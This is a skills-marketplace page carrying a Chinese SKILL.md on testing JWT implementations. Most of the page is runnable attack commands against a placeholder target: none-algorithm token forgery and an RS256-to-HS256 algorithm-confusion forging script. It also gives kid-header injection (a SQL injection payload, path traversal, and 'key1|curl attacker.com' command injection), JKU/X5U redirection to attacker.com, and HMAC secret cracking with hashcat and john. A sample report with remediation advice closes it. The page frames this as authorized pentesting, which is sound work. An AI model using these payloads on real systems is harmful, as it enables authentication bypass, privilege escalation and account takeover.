用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
直接命令不会经过审查 Prompt;运行前请先检查来源。
npx skills add https://github.com/killvxk/cybersecurity-skills-zh --skill testing-for-json-web-token-vulnerabilities命令会保持在同一行。复制前请横向滚动并检查完整内容。
想先保存到本地?可下载 SkillsMP 当前能够提供的文件。
通过分析 Zeek dns.log 中的高熵子域名查询、超量查询量、超长查询长度以及异常 DNS 记录类型,检测 DNS 隧道和数据外泄中的隐蔽通道通信。适用于:当需要狩猎基于 DNS 的 C2 或数据外泄通道、调查异常 DNS 查询模式、或响应涉及 DNS 隧道工具(iodine、dnscat2、DNSExfiltrator)的威胁情报时使用。
实施 Google 的 BeyondCorp 零信任访问模型,通过 IAP、Access Context Manager 和 Chrome Enterprise Premium,消除网络边界的隐式信任,强制执行基于身份的访问控制,实现无 VPN 的安全应用访问。适用于将传统 VPN 替换为零信任架构、部署 Identity-Aware Proxy、配置设备信任策略、或为远程办公实施上下文感知访问控制时使用。
在授权的安全评估过程中,使用 Burp Suite 的扫描器、Intruder 和 Repeater 工具识别和验证跨站脚本(XSS)漏洞。适用于 Web 应用渗透测试中检测反射型、存储型和 DOM 型 XSS,验证自动化扫描器报告的 XSS 发现,以及评估 CSP 和 XSS 过滤器的有效性时使用。
基于 SOC 职业分类
正在显示 SKILL.md
| name | testing-for-json-web-token-vulnerabilities |
| description | 测试 JWT 实现中的关键漏洞,包括算法混淆、none 算法绕过、kid 参数注入和弱密钥利用,以实现认证绕过和权限提升。 |
| domain | cybersecurity |
| subdomain | web-application-security |
| tags | ["jwt","json-web-token","algorithm-confusion","authentication-bypass","token-forgery","kid-injection","jku-attack"] |
| version | 1.0 |
| author | mahipal |
| license | Apache-2.0 |
# 安装 jwt_tool
pip install pyjwt
git clone https://github.com/ticarpi/jwt_tool.git
# 在不验证的情况下解码 JWT
python3 jwt_tool.py <JWT_TOKEN>
# 使用 base64 手动解码
echo "<header_base64>" | base64 -d
echo "<payload_base64>" | base64 -d
# 在 jwt.io 中检查 JWT
# 检查:算法(alg)、密钥 ID(kid)、发行者(iss)、受众(aud)
# 检查:过期时间(exp)、不早于(nbf)、声明(role、admin 等)
# JWT 头部检查示例
# {"alg":"RS256","typ":"JWT","kid":"key-1"}
# 注意查找:alg、kid、jku、jwk、x5u、x5c 头部
# 将算法改为"none"并移除签名
python3 jwt_tool.py <JWT_TOKEN> -X a
# 手动 none 算法攻击:
# 原始头部:{"alg":"HS256","typ":"JWT"}
# 修改后头部:{"alg":"none","typ":"JWT"}
# 编码新头部,保留 payload,移除签名(最后一个点后为空字符串)
# 尝试以下变体:
# "alg": "none"
# "alg": "None"
# "alg": "NONE"
# "alg": "nOnE"
# 发送伪造的 Token
curl -H "Authorization: Bearer <FORGED_TOKEN>" http://target.com/api/admin
# jwt_tool 自动化 none 攻击
python3 jwt_tool.py <JWT_TOKEN> -X a -I -pc role -pv admin
# 若服务器使用 RS256,尝试使用公钥作为 HMAC 密钥切换至 HS256
# 步骤 1:获取公钥
# 从 JWKS 端点获取
curl http://target.com/.well-known/jwks.json
# 从 SSL 证书获取
openssl s_client -connect target.com:443 </dev/null 2>/dev/null | \
openssl x509 -pubkey -noout > public_key.pem
# 步骤 2:使用公钥作为 HMAC 密钥伪造 Token
python3 jwt_tool.py <JWT_TOKEN> -X k -pk public_key.pem
# 手动算法混淆:
# 将头部从 {"alg":"RS256"} 改为 {"alg":"HS256"}
# 使用公钥通过 HMAC-SHA256 签名
python3 -c "
import jwt
with open('public_key.pem', 'r') as f:
public_key = f.read()
payload = {'sub': 'admin', 'role': 'admin', 'iat': 1700000000, 'exp': 1900000000}
token = jwt.encode(payload, public_key, algorithm='HS256')
print(token)
"
# 通过 kid 进行 SQL 注入
python3 jwt_tool.py <JWT_TOKEN> -I -hc kid -hv "' UNION SELECT 'secret-key' FROM dual--" \
-S hs256 -p "secret-key"
# 通过 kid 进行路径遍历
python3 jwt_tool.py <JWT_TOKEN> -I -hc kid -hv "../../dev/null" \
-S hs256 -p ""
# kid 指向空文件(使用空字符串签名)
python3 jwt_tool.py <JWT_TOKEN> -I -hc kid -hv "/dev/null" -S hs256 -p ""
# 通过 kid 实现 SSRF(若 kid 获取远程密钥)
python3 jwt_tool.py <JWT_TOKEN> -I -hc kid -hv "http://attacker.com/key"
# 通过 kid 进行命令注入(罕见但可能)
python3 jwt_tool.py <JWT_TOKEN> -I -hc kid -hv "key1|curl attacker.com"
# JKU(JSON Web Key Set URL)注入
# 将 jku 指向攻击者控制的 JWKS
# 步骤 1:生成密钥对
python3 jwt_tool.py <JWT_TOKEN> -X s
# 步骤 2:在攻击者服务器上托管 JWKS
# jwt_tool 生成 jwks.json - 将其托管在 http://attacker.com/.well-known/jwks.json
# 步骤 3:修改 JWT 头部,指向攻击者 JWKS
python3 jwt_tool.py <JWT_TOKEN> -X s -ju "http://attacker.com/.well-known/jwks.json"
# X5U(X.509 证书 URL)注入
# 与 JKU 类似,但使用 X.509 证书链
python3 jwt_tool.py <JWT_TOKEN> -I -hc x5u -hv "http://attacker.com/cert.pem"
# 嵌入式 JWK 攻击(在 JWT 头部注入密钥)
python3 jwt_tool.py <JWT_TOKEN> -X i
# 使用 hashcat 暴力破解 HMAC 密钥
hashcat -a 0 -m 16500 <JWT_TOKEN> /usr/share/wordlists/rockyou.txt
# 使用 jwt_tool 字典攻击
python3 jwt_tool.py <JWT_TOKEN> -C -d /usr/share/wordlists/rockyou.txt
# 使用 john the ripper
echo "<JWT_TOKEN>" > jwt.txt
john jwt.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=HMAC-SHA256
# 常见弱密钥尝试:
# secret, password, 123456, admin, test, key, jwt_secret
# 也可尝试:应用名称、公司名称、域名
# 找到密钥后,伪造任意 Token
python3 jwt_tool.py <JWT_TOKEN> -S hs256 -p "discovered_secret" \
-I -pc role -pv admin -pc sub -pv "admin@target.com"
| 概念 | 定义 |
|---|---|
| 算法混淆(Algorithm Confusion) | 使用公钥作为 HMAC 密钥,从非对称(RS256)切换到对称(HS256) |
| None 算法(None Algorithm) | 将 alg 设为"none"以创建未签名的 Token,被配置不当的服务器接受 |
| kid 注入(Kid Injection) | 利用密钥 ID 头部参数进行 SQLi、路径遍历或 SSRF |
| JKU/X5U 注入(JKU/X5U Injection) | 将密钥源 URL 指向攻击者控制的服务器以替换密钥 |
| 弱密钥(Weak Secret) | 可通过字典攻击暴力破解的 HMAC 密钥 |
| 声明篡改(Claim Tampering) | 在绕过签名验证后修改 Payload 声明(role、sub、admin) |
| Token 重放(Token Replay) | 在预期会话应已过期后,重复使用有效的 JWT |
| 工具 | 用途 |
|---|---|
| jwt_tool | 全面的 JWT 测试与利用工具包 |
| JWT Editor(Burp) | 用于 JWT 操控和攻击自动化的 Burp Suite 扩展 |
| hashcat | GPU 加速的 JWT 密钥暴力破解(模式 16500) |
| john the ripper | 基于 CPU 的 JWT 密钥破解 |
| jwt.io | 用于检查的在线 JWT 解码器和调试器 |
| PyJWT | 用于编程方式创建和验证 JWT 的 Python 库 |
## JWT 安全评估报告
- **目标**:http://target.com
- **JWT 算法**:RS256(声明)
- **JWKS 端点**:http://target.com/.well-known/jwks.json
### 发现
| # | 漏洞 | 技术 | 影响 | 严重性 |
|---|--------------|-----------|--------|----------|
| 1 | 接受 none 算法 | alg: "none" | 认证绕过 | Critical |
| 2 | 算法混淆 | RS256 -> HS256 | Token 伪造 | Critical |
| 3 | 弱 HMAC 密钥 | 暴力破解:"secret123" | 完全 Token 伪造 | Critical |
| 4 | kid 路径遍历 | kid: "../../dev/null" | 使用空密钥签名 | High |
### 修复建议
- 在 JWT 验证中强制执行算法白名单(拒绝"none")
- 使用非对称算法(RS256/ES256)并妥善管理密钥
- 对 HMAC 算法使用强随机密钥(256 位以上)
- 将 kid 参数验证为严格的允许列表
- 忽略 jku/x5u 头部,或仅验证已知端点
- 设置适当的 Token 过期时间(exp)并实施 Token 吊销